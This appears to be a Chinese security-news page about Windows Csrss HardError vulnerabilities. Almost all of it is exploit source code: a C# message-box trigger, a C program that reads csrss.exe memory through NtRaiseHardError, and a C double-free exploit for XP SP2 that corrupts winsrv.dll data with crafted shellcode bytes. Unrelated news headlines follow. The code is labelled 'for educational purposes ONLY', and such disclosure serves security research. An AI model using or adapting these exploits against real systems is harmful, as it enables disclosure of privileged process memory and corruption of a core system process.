|
[推荐]Microsoft Windows Csrss HardError消息多个安全漏洞
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);
static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i<10; i++)
MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
}
}
}
// >> csc /unsafe mbox.cs
// >> mbox.exe
==========================================================================
/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError
///// Csrss.exe memory disclosure
/////////////////////////////////////////
///// Ruben Santamarta
///// ruben at reversemode dot com
///// www.reversemode.com
/////////////////////////////////////////
///// 12.27.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <winbase.h>
#include <ntsecapi.h>
#define UNICODE
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS ((NTSTATUS) 0x00000000)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004)
#define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D)
#define SystemProcessesAndThreadsInformation 5
#define NTAPI __stdcall
int gLen=1;
typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS,
ULONG,
ULONG,
PULONG,
UINT,
PULONG);
typedef LONG NTSTATUS;
typedef LONG KPRIORITY;
typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;
typedef struct _SYSTEM_THREAD_INFORMATION {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION;
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
SYSTEM_THREAD_INFORMATION Threads[5];
} SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
ULONG GetCsrssThread()
{
ULONG cbBuffer = 0x5000;
ULONG tPointer;
LPVOID pBuffer = NULL;
NTSTATUS Status;
PCWSTR pszProcessName;
DWORD junk;
ULONG ThreadCount;
int i=0,b=0;
PQUERYSYSTEM NtQuerySystemInformation;
PSYSTEM_THREAD_INFORMATION pThreads;
PSYSTEM_PROCESS_INFORMATION pInfo ;
NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress(
LoadLibrary( "ntdll.dll" ),
"NtQuerySystemInformation" );
do
{
pBuffer = malloc(cbBuffer);
if (pBuffer == NULL)
{
printf(("Not enough memory\n"));
break;
}
Status = NtQuerySystemInformation(
SystemProcessesAndThreadsInformation,
pBuffer, cbBuffer, NULL);
if (Status == STATUS_INFO_LENGTH_MISMATCH)
{
free(pBuffer);
cbBuffer *= 2;
}
else if (!NT_SUCCESS(Status))
{
printf("NtQuerySystemInformation Error! ");
free(pBuffer);
}
} while (Status == STATUS_INFO_LENGTH_MISMATCH);
pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer;
for (;;)
{
if (pInfo->NextEntryDelta == 0)
break;
if(pInfo->ProcessName.Buffer!=NULL &&
!wcsicmp(pInfo->ProcessName.Buffer,L"csrss.exe"))
{
printf("\n[%ws] \n\n",
pInfo->ProcessName.Buffer);
printf("5 addresses for testing purposes\n\n");
for(b=0;b<5;b++)
{
printf("Thread %d ->
0x%x\n",b,pInfo->Threads[b].StartAddress);
}
tPointer=(ULONG)pInfo->Threads[1].StartAddress;
}
pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo)
+
pInfo->NextEntryDelta);
}
free(pBuffer);
return tPointer;
}
VOID WINAPI ReadBox( LPVOID param )
{
HWND hWindow,hButton,hText;
int i=0,b=0;
int gTemp;
char lpTitle[300];
char lpText[300];
char lpBuff[500];
for (;;)
{
lpText[0]=(BYTE)"";
Sleep(800);
hWindow = FindWindow("#32770",NULL);
if(hWindow != NULL)
{
GetWindowText(hWindow,(LPSTR)&lpTitle,250);
hText=FindWindowEx(hWindow,0,"static",0);
GetWindowText(hText,(LPSTR)&lpText,250);
hText=GetNextWindow(hText,GW_HWNDNEXT);
GetWindowText(hText,(LPSTR)&lpText,250);
gTemp = strlen(lpTitle);
if ( gTemp>1 ) gLen = gTemp;
else gLen = 1;
for(i = 0; i < gTemp; i++)
printf("%.2X",(BYTE)lpTitle[i]);
SendMessage(hWindow,WM_CLOSE,0,0);
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
}
}
}
int main()
{
UNICODE_STRING uStr={5,5,L"fun!"};
ULONG retValue,args[]={0,0,&uStr};
ULONG csAddr;
PNTRAISE NtRaiseHardError;
int i=0;
system("cls");
printf("##########################################\n");
printf("### Microsoft Windows NtRaiseHardError ###\n");
printf("##### Csrss.exe memory disclosure ######\n");
printf("@@@@@ Xmas Exploit - ho ho ho! @@@@@@\n");
printf("## Ruben Santamarta www.reversemode.com ##\n");
printf("##########################################\n\n");
NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"),
"NtRaiseHardError");
csAddr=GetCsrssThread();
args[0]=csAddr;
args[1]=csAddr;
printf("\n[+] Capturing Messages \n");
CreateThread( NULL,
0,
(LPTHREAD_START_ROUTINE)ReadBox,
0,
0,
NULL);
printf("\n[+] Now reading at: [0x%p] - Thread 1\n\n",csAddr);
for(;;)
{
printf("Reading bytes at [0x%p] : ",args[0]);
NtRaiseHardError(0x50000018,3,4,args,1,&retValue);
if(retValue && gLen<=1) printf("00\n");
else printf("\n");
args[0]+=gLen;
args[1]+=gLen;
}
}
=======================================================================
/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError
///// Csrss.exe-winsrv.dll Double Free
/////////////////////////////////////////
///// Ruben Santamarta
///// ruben at reversemode dot com
///// www.reversemode.com
/////////////////////////////////////////
///// 12.29.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////
////// XP SP2
////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <winbase.h>
#include <ntsecapi.h>
#define UNICODE
#define MAGIC_VALUE 0x75b4cd40 // winsrv.dll data section
BOOL gFon=FALSE;
typedef LONG NTSTATUS;
typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS,
ULONG,
ULONG,
PULONG,
UINT,
PULONG);
// Csrss.exe memory monitor thread
// (Read csrss.exe memory disclosure exploit for details)
VOID WINAPI ReadBox2( LPVOID param )
{
HWND hWindow,hButton,hText;
DWORD hChunk,cHeader=0;
int i=0,b=0;
int gTemp;
char lpTitle[300];
char lpText[300];
char lpBuff[500];
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
Sleep(2000);
for (;;)
{
lpText[0]=(BYTE)"";
Sleep(1000);
hWindow = FindWindow("#32770",NULL);
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
if(hWindow != NULL)
{
GetWindowText(hWindow,(LPSTR)&lpTitle,250);
if(strcmp(lpTitle,"Aa")!=0)
{
hText=FindWindowEx(hWindow,0,"static",0);
GetWindowText(hText,(LPSTR)&lpText,250);
hText=GetNextWindow(hText,GW_HWNDNEXT);
GetWindowText(hText,(LPSTR)&lpText,250);
cHeader=*(DWORD*)lpText;
if( cHeader!=0)
{
if(cHeader >0x100000 && cHeader<0x400000)
{
printf("\n**************************\n");
printf("Heap Chunk Found! Good Luck!\n");
printf("New Value: 0x%p",cHeader);
printf("\n**************************\n");
}
else
{
printf("\n****************************\n");
printf("winsrv.dll data overwritten! \n");
printf("New Value: 0x%p",cHeader);
printf("\n****************************\n");
}
}
else
{
printf("\n****************************\n");
printf("nothing found! ");
printf("\n****************************\n");
}
cHeader=*(DWORD*)lpTitle;
if( cHeader!=0)
{
if(cHeader >0x100000 && cHeader<0x400000)
{
printf("\n**************************\n");
printf("Heap Chunk Found! Good Luck!\n");
printf("New Value: 0x%p",cHeader);
printf("\n**************************\n");
}
else
{
printf("\n****************************\n");
printf("winsrv.dll data overwritten! \n");
printf("New Value: 0x%p",cHeader);
printf("\n****************************\n");
}
}
else
{
printf("\n****************************\n");
printf("nothing found! ");
printf("\n****************************\n");
}
}
SendMessage(hWindow,WM_CLOSE,0,0);
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
}
CloseHandle(hWindow);
}
}
VOID WINAPI ReadBox( LPVOID param )
{
HWND hWindow;
for (;;)
{
Sleep(1000);
if(!gFon)
{
hWindow = FindWindow("#32770",NULL);
if(hWindow != NULL )
{
SendMessage(hWindow,WM_CLOSE,0,0);
}
}
}
}
int main()
{
UNICODE_STRING uStr={5,5,L"fun!"};
ULONG retValue,args[]={MAGIC_VALUE,MAGIC_VALUE,(ULONG)&uStr};
PNTRAISE NtRaiseHardError;
DWORD dwThreadId;
byte *ShellCode ="\x5C\x3F\x3F\x5C\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75";
int i=0;
NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"),
"NtRaiseHardError");
system("cls");
printf("##########################################\n");
printf("### Microsoft Windows NtRaiseHardError ###\n");
printf("### Csrss.exe-winsrv.dll Double-Free ###\n");
printf("## Ruben Santamarta www.reversemode.com ##\n");
printf("##########################################\n");
printf("## + Csrss.exe Double-Free Exploit ##\n");
printf("## + Csrss.exe Memory Disclosure Exploit##\n");
printf("##########################################\n");
printf("# XP SP 2 #\n");
printf("##########################################\n\n");
printf("\nThe exploit overwrites controlled addresses\n");
printf("in winsrv.dll data section within Csrss.exe\n\n");
CreateThread( NULL,
0,
(LPTHREAD_START_ROUTINE)ReadBox,
0,
0,
&dwThreadId);
// Seeding the heap
for(i=0;i<2;i++) MessageBoxA(0,"\x40\xcd\xb4\x75","\x40\xcd\xb4\x75", MB_SERVICE_NOTIFICATION);
// Exploiting Csrss.exe Double-Free
printf("[*] Stage 1 -= Hitting Heap =-\n\n") ;
printf("[+] Corrupting the heap (11 attemps)\n\n");
for( i=0; i<11; i++)
{
printf("#%d... ",i+1);
MessageBoxA(0, ShellCode,"A", MB_SERVICE_NOTIFICATION);
}
gFon=TRUE;
printf("\n\n[*] Stage 2 -= Scanning winsrv.dll data section =-\n\n") ;
Sleep(2000);
CreateThread( NULL,
0,
(LPTHREAD_START_ROUTINE)ReadBox2,
0,
0,
NULL);
args[0]-=0x20;
// Exploiting Csrss.exe memory disclosure flaw
for(i=0;i<0xF;i++)
{
args[0]+=4;
printf("\n#%d Reading at : [0x%p]\n",i,args[0]);
NtRaiseHardError(0x50000018,3,4,args,1,&retValue);
}
printf("\n[+] Exploit exiting\n\n");
printf("#############################################################\n");
printf("If you didn't find anything, run the exploit one more time!\n");
printf("If you find a heap chunk address, enjoy!\n");
printf("#############################################################\n");
}
| MySQL联合创始人向Sun递交辞呈 | 10-10 |
| 惠普未来两年将在英国裁员近3500 | 10-10 |
| 英特尔买下Netbook.com域名 | 10-10 |
| 你的摄像头和麦克风是如何被黑客 | 10-10 |
| 美国军队公开招募黑客进行网络战 | 10-10 |
| 不法分子利用一条短信骗了80余万 | 10-10 |
| 美大学生侵入佩林州长个人邮件账 | 10-10 |
| 6名黑客盗取网民账号转卖被判1-4 | 10-10 |
| 造谣广西将有9级强震江苏19岁黑客 | 10-10 |
| 中国IT竞争力指数 排名全球第50位 | 10-09 |
您现在的位置: